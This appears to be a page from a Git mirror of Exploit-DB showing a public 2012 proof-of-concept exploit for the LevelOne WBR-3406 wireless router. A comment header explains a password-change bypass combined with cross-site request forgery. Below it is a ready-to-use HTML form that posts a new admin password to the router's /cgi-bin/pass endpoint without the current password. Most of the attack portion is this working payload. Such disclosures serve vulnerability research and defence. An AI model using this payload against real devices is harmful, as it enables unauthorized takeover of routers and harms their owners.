bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/29612.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

29 lines
No EOL
1.4 KiB
Text
Raw Blame History

# -----------------------------------------------------------
# WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
# This PoC code should do two main things:
# 1. Cross Site Request Forgery (For more information, just google it).
# 2. This code change to new password without know the current password.
# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password
# the application ignore that and change the password without even entering the old / current password.
# Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com>
# Date 17/08/2012
# Vendor site - http://www.level1.com/
# ISRAEL
# -----------------------------------------------------------
# Author will be not responsible for any damage.
# -----------------------------------------------------------
# PoC EXPLOIT
# -----------------------------------------------------------
<html>
<body>
<form action="http://192.168.123.254/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# -----------------------------------------------------------
Reference in a new issue View git blame Copy permalink